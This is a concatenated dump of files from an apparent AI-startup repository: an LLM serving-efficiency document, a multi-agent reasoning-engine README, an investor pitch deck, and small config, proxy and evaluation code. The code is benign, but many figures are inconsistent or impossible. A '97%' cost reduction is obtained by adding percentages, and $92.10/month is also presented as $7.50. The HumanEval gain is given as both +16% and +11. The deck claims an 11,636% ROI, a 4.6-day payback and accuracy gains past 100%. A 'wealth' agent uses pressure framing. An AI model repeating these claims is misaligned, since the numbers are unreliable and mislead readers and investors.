Skills](#using-skills)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[Using Agents](#using-agents)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[Auto-Activation System](#auto-activation-system)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[Workflow Templates](#workflow-templates)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[Customization](#customization)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[Advanced Usage](#advanced-usage)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[Performance Optimization](#performance-optimization)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PNKLN (pronounced "punchline") Skills &amp; Agents Registry is a comprehensive framework for autonomous AI workflow automation. It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 Core Skills**: Research, Design Critique, Copywriting, Monetization, Workflow Optimization,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 Specialized Agents**: Research, Design, Copy, Revenue, Project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**Auto-Activation System**: Intelligent skill/agent triggering based on user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**Workflow Templates**: Pre-configured multi-agent workflows for common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**Reduce execution time** by 60-80% through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**Improve output quality** with specialized expert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🔄 **Simplify complex workflows** with orchestrated multi-agent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**Increase consistency** through standardized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@anthropic-ai/claude-agent-sdk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Load Registry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skills = require('./pnkln/skills-registry.yaml');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agents = require('./pnkln/agents-registry.yaml');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rules = require('./pnkln/skill-rules.json');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Initialize PNKLN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PNKLNEngine } = require('./pnkln/engine');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engine = new PNKLNEngine({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skills: skills,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agents: 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activationRules: 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autoActivate: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engine.initialize();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Use Your First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Explicit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engine.activateSkill('research_explorer',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topic: 'AI agent orchestration trends 2025',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depth_level: 'deep'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let auto-activation handle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engine.processUserPrompt(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'Research AI agent orchestration trends for 2025'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**That's it!** You're now running PNKLN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User Input / Project Request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Auto-Activation Engine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(skill-rules.json)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Pattern matching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Semantic analysis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Agent selection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Agent Layer (agents-registry.yaml)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ResearchAgent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DesignAgent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CopyAgent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RevenueAgent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ProjectDeepAgent (Orchestrator)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Skills Layer (skills-registry.yaml)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ResearchExplorerSkill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DesignCriticSkill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CopyConverterSkill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MonetizationArchitectSkill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WorkflowRefinerSkill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PromptCraftSkill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Output / Deliverables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**User Input** → Auto-activation engine parses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**Pattern Matching** → Identifies relevant skills/agents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Selection** → Chooses best agent(s) for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**Skill Execution** → Agent invokes required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**Result Synthesis** → Combines outputs into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**User Delivery** → Returns structured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 &amp;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v18+ or Python 3.9+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 v0.1.30+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to Claude API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Option A: NPM Package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pnkln-agent-registry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Option B: Manual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or copy the pnkln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-r /path/to/pnkln ./pnkln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@anthropic-ai/claude-agent-sdk js-yaml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`pnkln.config.json` in your project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"skills_registry": "./pnkln/skills-registry.yaml",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"agents_registry": "./pnkln/agents-registry.yaml",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"activation_rules": "./pnkln/skill-rules.json",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"auto_activation":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"confidence_threshold":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"max_concurrent_skills":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"claude_config":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"model": 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"api_key": "${ANTHROPIC_API_KEY}",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"max_tokens":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"ttl":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"storage": "redis"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"logging":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"level":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"output": "./logs/pnkln.log"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ANTHROPIC_API_KEY=your_api_key_here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PNKLN_CACHE_ENABLED=true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PNKLN_AUTO_ACTIVATE=true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Using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 Skill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engine.activateSkill('research_explorer',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topic: 'SaaS pricing models for developers',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depth_level: 'deep',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perspectives: ['business', 'user', 'competitive'],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challenge_assumptions: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console.log(result.findings.summary);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console.log(result.findings.challenged_assumptions);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Research → Monetization →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workflow = engine.createWorkflow([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skill: 'research_explorer',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{ topic: 'AI developer tools market'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skill: 'monetization_architect',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(previousResult)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business_model: 'SaaS',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competitive_landscape: previousResult.findings.evidence_base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skill: 'copy_converter',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(previousResult)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copy_type: 'landing_page',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product_service: 'AI Development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primary_benefit: previousResult.monetization_blueprint.revenue_model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results = await workflow.execute();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 ID | Use When | Typical Output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`research_explorer` | Need deep analysis, evidence, multi-perspective insights | 10-30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`design_critic` | Evaluating UI/UX, simplifying designs | 5-15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`copy_converter` | Creating marketing copy, ads, emails | 3-10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`monetization_architect` | Designing pricing, revenue models | 10-20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`workflow_refiner` | Optimizing processes, finding bottlenecks | 5-15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`prompt_craft` | Creating AI prompts, instructions | 2-5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researchResult = await engine.activateAgent('research_agent',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research_topic: 'Emerging AI frameworks for multi-agent systems',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depth_level: 'exhaustive',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time_constraint: 1800  //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Access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console.log(researchResult.research_report);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console.log(researchResult.assumption_analysis);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console.log(researchResult.recommended_actions);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Design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designCritique = await engine.activateAgent('design_agent',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design_artifact: './mockups/landing-page.png',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design_type: 'ui',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ruthlessness_level: 'jobs_level',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target_platform: 'web'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console.log(`Beauty Score: ${designCritique.beauty_score}/10`);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console.log(`Simplicity Score: ${designCritique.simplicity_score}/10`);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console.log('Remove:', designCritique.removal_recommendations);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Copy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copy = await engine.activateAgent('copy_agent',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copy_type: 'landing_page',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product_service: 'AI Workflow Automation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target_audience: 'Technical founders and CTOs',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primary_benefit: 'Reduce engineering time by 60%',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tone: 'professional'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console.log(copy.primary_copy.headline);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console.log(copy.primary_copy.cta);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console.log(copy.ab_test_variants);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Revenue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monetization = await engine.activateAgent('revenue_agent',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business_model: 'Usage-based SaaS with free tier',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target_customer: 'Early-stage startups',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current_revenue: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mrr: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console.log(monetization.revenue_model_recommendation);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console.log(monetization.pricing_strategy);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console.log(monetization.financial_projections);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Project Deep Agent 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 = await engine.activateAgent('project_deep_agent',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project_description: 'Launch new AI-powered code review tool',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project_goals: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'Market research and positioning',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'Pricing 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'Landing page design and copy',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'Launch workflow automation'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timeline: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deadline: '2025-12-01',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milestones: ['Research complete', 'Design approved', 'Launch ready']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ProjectDeepAgent orchestrates multiple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console.log(project.agent_assignments);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console.log(project.integrated_deliverables);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Auto-Activation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PNKLN auto-activation engine intelligently detects user intent and activates the appropriate skills/agents.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**User Input Parsing**: Analyzes user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**Pattern Matching**: Checks against trigger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**Semantic Analysis**: Uses embeddings for intent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**Confidence Scoring**: Calculates activation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**Skill/Agent Selection**: Chooses best match(es)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**Auto-Execution**: Runs if confidence &gt;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Activation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Keyword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"Research the best practices for API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Auto-activates: research_explorer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Pattern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"research: microservices vs monolith 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Auto-activates: research_agent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Explicit Mentions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"@copy write landing page for developer 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Auto-activates: copy_agent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Semantic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"I need compelling text for my product homepage"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Semantic match: copy_converter skill (0.87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Controlling Auto-Activation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Disable Auto-Activation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engine.setAutoActivation(false);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Now requires explicit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engine.activateSkill('research_explorer',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Adjust Confidence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engine.setConfidenceThreshold(0.85); // Higher = more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Manual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"Research pricing models [no-auto]"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Auto-activation suppressed, manual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Pre-configured multi-agent workflows for common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Product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launch = await engine.executeWorkflow('new_product_launch',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product: 'AI Code Assistant',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target_market: 'Individual developers',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deadline: '2025-12-15'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ResearchAgent: Market research, competitors, customer pain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RevenueAgent: Pricing strategy, monetization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DesignAgent + CopyAgent (parallel): UI design, marketing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4. WorkflowRefiner: Launch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console.log(launch.research_findings);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console.log(launch.pricing_strategy);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console.log(launch.marketing_assets);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console.log(launch.launch_plan);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Marketing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campaign = await engine.executeWorkflow('marketing_campaign',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campaign_type: 'Product announcement',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channels: ['email', 'linkedin', 'twitter'],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target_audience: 'CTOs at Series A startups'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ResearchAgent: Audience analysis, message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CopyAgent + DesignAgent (parallel): Ad copy, creative assets, landing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console.log(campaign.audience_insights);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console.log(campaign.copy_variants);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console.log(campaign.creative_assets);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revenueOptimization = await engine.executeWorkflow('revenue_optimization',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current_mrr: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goal_mrr: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timeline_months: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ResearchAgent + RevenueAgent (parallel): Competitive pricing,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CopyAgent + DesignAgent (parallel): Pricing page copy, pricing page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console.log(revenueOptimization.revenue_strategy);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console.log(revenueOptimization.pricing_page);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customWorkflow = engine.defineWorkflow({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'feature_launch',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'Launch new feature with research, design, and marketing',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'Discovery',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agents: ['research_agent'],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tasks: ['User research', 'Feature validation']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'Execution',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agents: ['design_agent', 'copy_agent'],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parallel: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tasks: ['Feature design', 'Announcement copy']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customWorkflow.execute({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feature: 'Real-time collaboration',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target_users: 'Team plan customers'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Adding Custom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`custom-skill.yaml`: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custom_analysis_skill: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"custom-analysis-v1"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"CustomAnalysisSkill"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"Your custom skill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"Capability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"Capability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input_field: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prompt_template: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Your custom prompt template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{input_field}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["custom", "analyze"]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Register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engine.registerSkill('./custom-skill.yaml');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Modifying Activation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`skill-rules.json`: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"skill_rules":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"research_explorer":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"exact_triggers":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"your_custom_trigger"  // Add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"confidence_threshold": 0.80  // Adjust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Agent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engine.modifyAgentBehavior('research_agent',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autonomy_level: 'low',  // Require more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max_execution_time: 600,  // Reduce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custom_handler: async (input)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Your custom pre-processing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processedInput;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Skill Not Auto-Activating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User prompt doesn't trigger expected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 activation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debug = await engine.debugActivation(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'Research AI agent frameworks'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console.log(debug.matched_skills);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console.log(debug.confidence_scores);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console.log(debug.why_not_activated);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causes**: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threshold too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Ambiguous phrasing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Negative trigger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Agent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Agent execution exceeds max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Increase timeout for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engine.configureAgent('research_agent',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max_execution_time: 3600  //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Low-Quality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Skill output doesn't meet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Provide more detailed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engine.activateSkill('copy_converter',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copy_type: 'landing_page',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product_service: 'Detailed product description here',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target_audience: 'Specific persona with pain points',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primary_benefit: 'Concrete, measurable benefit',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brand_voice: 'Professional, technical but approachable',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competitor_copy: ['Example 1', 'Example 2']  // More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Conflicting Agent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Multiple agents produce inconsistent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ProjectDeepAgent to orchestrate and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engine.activateAgent('project_deep_agent',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project_description: 'Your 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conflict_resolution: 'prioritize_revenue_agent'  // Set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Debug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 verbose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engine.setDebugMode(true);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Now all activation decisions are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engine.processUserPrompt('Research topic');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console.log(engine.getDebugLog());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registry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validate-registry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skills-registry.yaml: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agents-registry.yaml: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skill-rules.json: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Streaming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stream = engine.activateSkillStream('research_explorer',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topic: 'AI safety research 2025'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await (const chunk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(chunk.type === 'progress')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console.log(`Progress: ${chunk.percentage}%`);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(chunk.type === 'finding')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console.log(`New finding: ${chunk.data}`);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(chunk.type === 'complete')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console.log('Research complete!');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console.log(chunk.final_result);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Parallel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results =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engine.activateAgent('research_agent', { topic: 'Market size'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engine.activateAgent('copy_agent', { copy_type: 'email'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engine.activateAgent('design_agent', { design_artifact: 'mockup.png'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[research, copy, design] =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Caching &amp;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Enable result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engine.enableCaching({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provider: 'redis',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ttl: 3600,  //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keyPrefix: 'pnkln:'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First call: executes and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result1 = await engine.activateSkill('research_explorer',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topic: 'AI trends'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Second call with same params: instant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result2 = await engine.activateSkill('research_explorer',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topic: 'AI trends'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Webhooks &amp;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engine.on('skill_activated',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console.log(`Skill ${event.skill_id} started`);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Send to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engine.on('skill_completed',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console.log(`Skill ${event.skill_id} completed in ${event.duration}ms`);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Track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engine.on('agent_error',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console.error(`Agent ${event.agent_id} error:`, event.error);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Alert monitoring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metrics = await engine.getMetrics({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timeRange: 'last_7_days',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groupBy: 'skill_id'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console.log('Skill Usage:', metrics.skill_usage);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console.log('Success Rate:', metrics.success_rate);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console.log('Avg Execution Time:', metrics.avg_execution_time);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Auto-Activation**: Let the engine choose skills instead of manual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Caching**: Cache results for repeated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**Parallel Execution**: Run independent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**Streaming**: Use streaming for long-running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**Appropriate Timeouts**: Set realistic timeouts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Without PNKLN | With PNKLN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 Research | 2-4 hours | 15-30 min | 80%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Landing Page Copy | 1-2 hours | 5-10 min | 85%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Design Critique | 30-60 min | 5-15 min | 75%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Strategy | 2-3 hours | 10-20 min | 85%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Product Launch | 2-3 days | 4-6 hours | 90%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Batch similar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topics = ['Topic A', 'Topic B', 'Topic C'];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results = await Promise.all(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topics.map(topic =&gt; engine.activateSkill('research_explorer', { topic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Use lower depth for quick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engine.activateSkill('research_explorer',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topic: 'Quick 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depth_level: 'surface'  //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Reuse agent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await engine.getAgent('research_agent');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agent.execute({ topic: 'Topic 1'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agent.execute({ topic: 'Topic 2' });  // Reuses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**Try the templates**: Start with `templates/` directory for copy-paste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a pilot project**: Pick a real project and use ProjectDeepAgent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**Measure impact**: Track time saved, quality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**Customize**: Add your own skills and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**Share feedback**: Contribute improvements back to the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[Full API Reference](./api-reference.md)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**Examples**: [/examples directory](./examples/)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**Community**: [GitHub Discussions](#)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[GitHub Issues](#)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v1.0.0 (2025-11-15)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core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Auto-activation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workflow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 ❤️ for autonomous AI workflows**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apps/aiyou_stack/aiyou-fastapi-services/pnkln/integration-guide.md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config.prompts import EXECUTIVE_PROMPT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pnkln_core.services.vertex_ai import run_task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pnkln_core.utils.router import route_task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entrypoint for the pnkln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Takes a task description from the command line, routes it, and passes it to the executive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 main.py &lt;task_description&gt;")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task_description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Route the task to determine the primary agent/domain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target_domain = route_task(task_description)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print(f"Task routed to domain: {target_domain}")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Format the prompt for the executive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final_prompt = EXECUTIVE_PROMPT["user"].format(task=task_description)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Sending task to executive agent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the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run_task(final_prompt)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print("\n--- Agent Response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print(f"\nError executing task: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print("(Ensure you have authenticated with GCP and have the correct permissions)")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print("\n----------------------")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apps/aiyou_stack/aiyou-fastapi-services/pnkln/pnkln_mission_start.py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// MISSION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pnkln_tasks.sh and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load_doctrine():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open("pnkln/Prompts/pnkln_SOPSnippets.json")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execute_tier_30():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ACTIVATING TIER 30: THE CHILD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30 VERTICALS ENGAGED")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print("🛡️ JUDGE #6 BRAKES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LOADED {len(doctrine)} SOPs")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execute_tier_30()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apps/aiyou_stack/aiyou-fastapi-services/pnkln/pnkln_mission_start.py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apps/aiyou_stack/aiyou-fastapi-services/pnkln/pnkln_tasks.sh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Task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Executes doctrine validation and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"PNKLN // TASK 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Monte Carlo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"📊 Running Portfolio Monte Carlo..."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"$SCRIPT_DIR/Notebooks/pnkln_PortfolioMonteCarlo.py"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CodePMCS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"🔧 Running CodePMCS inspection..."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"$SCRIPT_DIR/codepmcs.py" "$SCRIPT_DIR/.." 2&gt;/dev/null || echo "   (CodePMCS deps not installed)"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Launching Squadron..."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"$SCRIPT_DIR/pnkln_mission_start.py"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PNKLN TASKS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apps/aiyou_stack/aiyou-fastapi-services/pnkln/pnkln_tasks.sh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— Roll-Up Packet for Google Sales (Nick)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2025-10-29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pnkln (formerly ShadowTag-v4/Omega)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**Contact:** Founder (private), via this package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compiles our scripts and prompt templates into Google Vertex AI Studio–friendly assets. This packet is designed for a quick sales/solutions review by Google Cloud (Nick). It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consolidated **README**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**Test Index** with smoke/validation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Studio **shell-cell ready** snippets and **prompt templates**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 scripts to run locally or in Vertex AI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Note: This is a structure &amp; sample content roll-up. If you require the full private codebase, we can deliver via a secure channel upon mutual NDA.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pnkln Does (at a glance)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Converts mixed scripts &amp; prompts → **Vertex AI Studio native cells** (Jupyter/Notebook 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Standardizes naming &amp; structure under the **pnkln**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Preps **demo flows** for sales/SE enablement &amp; quick proof-of-value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Who It's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Cloud Sales / Solutions (Nick)** evaluating feasibility &amp; fit for Vertex AI +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**SEs** who want runnable, minimal demo scripts and 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SALES_BRIEF_NICK.md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pnkln_prompt_templates.md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run_demo.sh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deploy_gcp.sh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smoke/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00_env_check.sh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prompt_validation.py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vertex_studio/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demo_notebook_shell_cells.txt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TEST_INDEX.md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(Vertex AI Studio / Notebooks)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 Vertex AI Notebook and paste the following **shell cell** blocks as-is.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1) Environment &amp; CLI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%%bash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"[pnkln] Env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--version || echo "gcloud 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2) (Optional) Auth to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%%bash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in a local notebook; on Vertex AI Workbench, you may already be authenticated.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 --brief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3) Run the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%%bash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pnkln/scripts/run_demo.sh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./pnkln/scripts/run_demo.sh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user PII shipped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everything encrypted at rest and in transit.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any data integrations, use secret managers / scoped service accounts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this packet is sufficient for initial review, we'll schedule a deeper technical session to walk through full assets and private repos under NDA.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apps/aiyou_stack/aiyou-fastapi-services/pnkln/skills-registry.yaml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skills library for workflow automation and AI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SKILL 1: Research Explorer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research_explorer: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"research-explorer-v1"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"ResearchExplorerSkill"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"Deep topic exploration with assumption-challenging and multi-perspective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"Deep domain research with academic rigor"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"Assumption identification and challenging"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"Multi-perspective synthesis"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"Edge case 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"Contradictory evidence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"Research gap identification"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"Main research topic or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depth_level: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"enum"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["surface", "medium", "deep", "exhaustive"]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"deep"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"Research depth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perspectives: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["technical", "business", "user", "ethical"]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"Perspectives to explore"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challenge_assumptions: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"boolean"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"Whether to actively challenge stated assumptions"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"Executive summary of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key_insights: "Array of critical discoveries"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challenged_assumptions: "Assumptions identified and challenged"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evidence_base: "Supporting evidence with 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contradictions: "Conflicting information discovered"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research_gaps: "Areas requiring further investigation"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recommendations: "Actionable next steps"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 research explorer with the following mission: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TOPIC: {topic}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DEPTH: {depth_level}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PERSPECTIVES: {perspectives}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research methodology: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**Question Everything**: Start by identifying assumptions in the topic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**Multi-Angle Attack**: Explore from technical, business, user, and ethical angles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**Seek Contradictions**: Actively look for evidence that contradicts common wisdom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**Edge Case Hunting**: Find the boundaries where conventional thinking breaks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**Gap Mapping**: Identify what's NOT known or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 findings in this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Executive Summary (3-5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 Insights (ranked by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Challenged Assumptions (what everyone assumes but shouldn't)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Evidence Base (with specific sources/examples)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Contradictions Found (conflicting information)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 Gaps (what needs further investigation)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Recommendations (concrete next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Think like a skeptical scientist, not a confirming researcher.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["research", "explore", "investigate", "analyze deeply", "what are the assumptions"]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["^research:", "^explore:", "deep dive into", "challenge assumptions"]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context_markers: ["need evidence", "comprehensive analysis", "multi-perspective"]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"Number of assumptions challenged"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"Diversity of perspectives covered"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"Evidence quality and citation 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"Contradictions identified"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"Actionability of recommendations"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SKILL 2: Design Critic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design_critic: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"design-critic-v1"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"DesignCriticSkill"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"Jobs-style design review focusing on beauty, simplicity, and function harmony"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"Visual/UX design critique"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"Simplicity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"Beauty-function balance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"User delight evaluation"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"Ruthless feature removal suggestions"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"Design principle adherence checking"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design_artifact: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"Description, screenshot, or wireframe of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"enum"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["ui", "ux", "visual", "interaction", "information_architecture"]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evaluation_criteria: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["beauty", "simplicity", "function", "delight", "coherence"]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"Criteria to evaluate against"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ruthlessness_level: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"enum"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["gentle", "balanced", "ruthless", "jobs_level"]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"ruthless"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"How aggressive to be in simplification"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critique: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overall_assessment: "Summary judgment (approve/revise/reject)"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beauty_score: "Visual appeal rating (1-10)"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simplicity_score: "Simplicity rating (1-10)"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function_score: "Functional effectiveness (1-10)"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what_works: "Elements that achieve excellence"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what_fails: "Elements that fall short"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remove_immediately: "Features/elements to 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design_debt: "Compromises that will haunt you later"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path_to_greatness: "Specific improvements needed"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 design critic in the spirit of Steve Jobs and Dieter Rams.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 TO CRITIQUE: {design_artifact}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{design_type}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RUTHLESSNESS: {ruthlessness_level}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evaluation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**Beauty**: Does it spark joy? Is every pixel intentional?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**Simplicity**: Can you remove anything? Is complexity essential or accidental?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**Function**: Does form follow function perfectly? Any friction?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**Delight**: Does it surprise and delight? Or just "work"?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**Coherence**: Does every element belong to a unified vision?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critique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**First Impression** (gut reaction in 10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**Beauty Analysis** (score 1-10, specific observations)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**Simplicity Analysis** (score 1-10, what to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**Function Analysis** (score 1-10, friction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**What Works** (celebrate excellence)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**What Fails** (be specific and brutal)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**Remove Immediately** (list features/elements to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8. **Design Debt** (compromises that will compound)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9. **Path to Greatness** (3-5 concrete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10. **Final Verdict** (Approve/Revise/Reject with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Remember: "Simplicity is the ultimate sophistication."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element must justify its existence.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["design review", "critique design", "evaluate ui", "simplify", "does this look good"]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["^critique:", "^review design:", "make it simpler", "jobs would say"]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context_markers: ["too complex", "visual feedback", "user experience"]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"Specificity of feedback"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"Number of simplification suggestions"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"Actionability of recommendations"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"Beauty-function balance insight"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SKILL 3: Copy Converter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copy_converter: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"copy-converter-v1"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"CopyConverterSkill"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"High-converting copy generation using proven psychological triggers"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"Landing page copy creation"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"Email sequence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"Ad copy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"CTA crafting"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"Psychological trigger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"A/B test variant creation"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"enum"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["landing_page", "email", "ad", "cta", "social_post", "sales_page"]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product_service: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"What you're selling"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target_audience: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"Who you're selling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primary_benefit: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"Core value proposition"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psychological_triggers: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["scarcity", "social_proof", "authority", "reciprocity", "curiosity"]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"Triggers to employ"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"enum"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["professional", "casual", "urgent", "empathetic", "authoritative"]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"professional"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headline: "Attention-grabbing headline"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subheadline: "Supporting subheadline"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"Main copy body"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cta: "Call-to-action"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variants: "A/B test variations"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trigger_analysis: "Which triggers used and why"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expected_conversion_lift: "Estimated improvement over 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 direct response copywriter who combines Eugene Schwartz's psychological insight with modern conversion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MISSION: Create {copy_type} copy that converts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PRODUCT/SERVICE: {product_service}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AUDIENCE: {target_audience}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PRIMARY BENEFIT: {primary_benefit}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TRIGGERS TO USE: {psychological_triggers}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TONE: {tone}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copy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**Headline**: Stop the scroll (curiosity + benefit)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**Subheadline**: Amplify desire (specific outcome)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**Body**: Build case (proof + emotion +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**CTA**: Remove friction (clear + urgent + low-risk)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Psychological principles to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**Scarcity**: Limited availability creates urgency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**Social Proof**: Others' success reduces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**Authority**: Credibility transfers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**Reciprocity**: Give value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**Curiosity**: Open loops demand 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**Loss Aversion**: Emphasize what they'll miss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**Primary Copy**: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Headline (10-15 words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Subheadline (15-25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Body (structured for skim-reading)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CTA (action-oriented, friction-free)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**A/B Test Variants** (3 variations):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Variant A: Different angle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Variant B: Different trigger emphasis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Variant C: Different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**Trigger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Which triggers you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Why they fit this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Where they appear in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**Conversion Hypothesis**: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Expected lift over generic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Key success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 like you're having a conversation with a smart friend who has the exact problem you're solving.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["write copy", "landing page", "email sequence", "convert better", "sales copy"]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["^copy:", "^write:", "need copy for", "increase conversions"]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context_markers: ["conversion rate", "cta", "call to action", "marketing"]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"Clarity of value proposition"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"Psychological trigger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"CTA strength"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"Skim-readability"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"Variant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SKILL 4: Monetization Architect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monetization_architect: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"monetization-architect-v1"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"MonetizationArchitectSkill"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"Backend revenue systems design and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"Revenue model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"Pricing strategy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"Monetization flow mapping"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"Payment integration planning"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"Revenue leak identification"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"LTV/CAC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business_model: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"Current or planned business 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current_revenue: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"Existing revenue streams and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target_customer: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"Target customer profile"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competitive_landscape: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"How competitors monetize"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"Technical or business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monetization_blueprint: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revenue_model: "Recommended monetization approach"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pricing_strategy: "Tier structure and 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implementation_phases: "Rollout plan with milestones"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technical_requirements: "Systems and integrations needed"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risk_factors: "What could break or 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optimization_levers: "How to increase revenue over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financial_projections: "Expected revenue curves"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 monetization architect who designs revenue systems that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Business Model: {business_model}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Revenue: {current_revenue}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 Customer: {target_customer}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Competition: {competitive_landscape}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Constraints: {constraints}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monetization design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**Phase 1: Revenue Model Selection**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Evaluate these models for fit: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Subscription (recurring, predictable)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Usage-based (aligns cost with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Freemium (land-and-expand)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Transaction fee (percentage of value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Hybrid (combine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**Phase 2: Pricing Strategy**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 tier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Value metric (what to charge for)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Price anchoring (high tier sets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Good-Better-Best psychology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Feature gating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**Phase 3: Implementation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Technical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Payment gateway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Subscription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Usage tracking/metering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Billing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**Phase 4: Optimization Levers**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How to grow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Expansion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Churn reduction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Pricing experiment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LTV maximization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**Revenue Model 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Primary model and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Why it fits your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Expected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**Pricing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Tier names and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Price points with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Feature allocation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Upgrade incentives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**Implementation Roadmap**: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Phase 1: MVP monetization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Phase 2: Full system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Phase 3: Optimization (ongoing)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**Technical Blueprint**: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Payment provider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Integration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Data tracking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Analytics dashboard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**Risk Assessment**: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Payment failure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Churn risk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Competitive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**Optimization Playbook**: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Month 1-3: Launch and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Month 4-6: First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Month 7-12: Scale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Ongoing: Experimentation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Think like a CFO and a growth hacker combined.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["monetization", "revenue model", "pricing strategy", "how to charge", "payment system"]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["^monetize:", "^revenue:", "how should we price", "make money from"]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context_markers: ["subscription", "pricing tier", "payment", "revenue"]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"Model-market fit"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"Implementation feasibility"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"Revenue predictability"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"Optimization potential"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SKILL 5: Workflow Refiner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workflow_refiner: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"workflow-refiner-v1"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"WorkflowRefinerSkill"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"Ruthless simplification and workflow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"Process bottleneck identification"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"Unnecessary step elimination"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"Automation opportunity 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"Workflow visualization"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"Efficiency metric definition"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"Simplification recommendations"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workflow_description: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"Current workflow or process"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workflow_type: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"enum"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["development", "marketing", "sales", "operations", "creative", "support"]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pain_points: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"Known friction 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["reduce_time", "reduce_errors", "increase_throughput"]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"Optimization goals"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"Existing tools and systems"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optimized_workflow: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current_state_analysis: "Problems with current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bottlenecks: "Critical constraint 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waste_inventory: "Unnecessary steps/activities"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optimized_workflow: "Streamlined process"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automation_opportunities: "What to automate and how"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expected_improvements: "Quantified efficiency gains"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implementation_plan: "How to transition"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 workflow efficiency expert with zero tolerance for waste.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OPTIMIZE THIS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{workflow_description}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{workflow_type}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Pain Points: {pain_points}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Goals: {goals}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Available Tools: {tools_available}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optimization methodology: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**Step 1: Waste Identification**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 the 7 deadly wastes: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Waiting (idle time between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Over-processing (unnecessary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Rework (errors requiring correction)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Motion (switching between tools/contexts)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Inventory (work-in-progress buildup)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Over-production (doing more than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Skills underutilization (manual work that could be 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**Step 2: Bottleneck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Identify the constraint (slowest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Measure throughput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Calculate cost of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**Step 3: Simplification**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 these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Eliminate: Can this step be removed entirely?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Combine: Can steps be merged?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Rearrange: Better sequence?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Simplify: Easier way to do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Automate: Should a human do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**Step 4: Automation Mapping**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each step, determine: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Can be fully automated (no human)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Can be assisted (human + AI/tools)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Must be manual (human judgment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**Current State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Workflow map (visualize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Time per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Error rate per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Total cycle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**Waste Inventory**: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List of unnecessary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Redundant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Over-complicated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Estimated time wasted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**Bottleneck Report**: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Primary constraint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Throughput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Root cause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Fix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**Optimized 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Streamlined process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Steps eliminated (with rationale)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Steps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New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Expected cycle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**Automation Roadmap**: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Quick wins (automate in &lt;1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Medium-term (1-4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Long-term (1-3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Tools/integrations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Expected ROI per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**Implementation Plan**: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Week 1: Low-hanging fruit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Week 2-4: Core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Month 2-3: Automation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Success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**Before/After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Cycle time: X hours → Y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Error rate: X% → Y%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Throughput: X/day → Y/day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Estimated time saved: X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 ruthless. If a step doesn't add clear value, kill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["optimize workflow", "simplify process", "too many steps", "workflow efficiency", "automate"]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["^optimize:", "^simplify:", "streamline", "reduce friction"]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context_markers: ["bottleneck", "slow process", "too complicated", "waste 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"Percentage of steps eliminated"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"Cycle time reduction"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"Automation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"Implementation feasibility"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SKILL 6: Prompt Craft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prompt_craft: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"prompt-craft-v1"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"PromptCraftSkill"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"Elegant, high-performance prompt generation and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"Prompt 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"Instruction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"Context compression"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"Output format specification"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"Few-shot example creation"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"Chain-of-thought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task_description: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"What the prompt should accomplish"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"enum"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["gpt4", "claude", "gemini", "generic"]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"claude"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"AI model that will use this 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output_format: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"Desired output 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complexity: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"enum"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["simple", "moderate", "complex", "expert"]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"moderate"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"Task complexity level"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"Special requirements or limitations"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prompt_package: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optimized_prompt: "Ready-to-use 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system_message: "System/context instructions"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few_shot_examples: "Example inputs/outputs"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usage_notes: "How to use effectively"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variations: "Alternative prompt versions"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expected_performance: "Quality and consistency expectations"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 prompt engineering specialist who creates prompts that consistently produce excellent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TASK: Create a prompt for this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{task_description}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 Model: {target_model}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Desired Output: {output_format}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Complexity: {complexity}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Constraints: {constraints}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prompt design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**Principle 1: Clarity Over Cleverness**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 simple, direct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One instruction per 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Avoid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**Principle 2: Context Before Task**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Set role/persona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Provide relevant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State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**Principle 3: Structure Generates Consistency**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 numbered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Define output format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Provide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**Principle 4: Constraints Enable Creativity**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Specify what NOT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Set boundaries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Define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**Principle 5: Test and Refine**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Include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Anticipate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Build in self-correction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 structure to follow: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[ROLE/CONTEXT]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 [specific role] with [specific expertise].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task is to [specific action] in order to [desired outcome].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[INSTRUCTIONS]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[Step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[Step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[Step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Do not [forbidden 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Always [required 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Ensure [quality standard]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[OUTPUT FORMAT]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 your response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[Structure specification]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[EXAMPLES]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Example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Input: [example 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Output: [example output]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**Primary Prompt**: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Complete, copy-paste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Optimized for {target_model}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Follows structure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**System Message** (if applicable):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Context that persists across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Role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Global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**Few-Shot Examples** (3-5 examples):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Cover common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Include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Show desired output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**Usage Notes**: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Best practices for this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Common pitfalls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How to adjust for different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**Prompt Variations**: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Version A: Concise (for simple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Version B: Detailed (for complex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Version C: Chain-of-thought (for reasoning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**Performance Expectations**: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Consistency score (how often it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Quality level (output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Failure modes (when it breaks)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 prompts that work the first time, every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["create prompt", "prompt engineering", "write instructions", "optimize prompt"]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["^prompt:", "^craft:", "need a prompt for", "prompt that does"]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context_markers: ["ai instructions", "llm task", "model instructions"]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"Prompt clarity"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"Instruction completeness"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"Output consistency"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"Edge case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 &amp;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registry_version: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last_updated: "2025-11-15"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total_skills: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compatibility: "Claude Agent SDK v0.1.30+"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skill_categories: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research: ["research_explorer"]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["design_critic"]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marketing: ["copy_converter"]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business: ["monetization_architect"]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operations: ["workflow_refiner"]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engineering: ["prompt_craft"]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usage_stats_schema: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skill_id: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activation_count: "number"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"percentage"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avg_execution_time: "milliseconds"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user_satisfaction: "rating_1_to_5"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apps/aiyou_stack/aiyou-fastapi-services/pnkln/skills-registry.yaml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2026-04-23T21:44:16.387Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-23T21:44:16.387Z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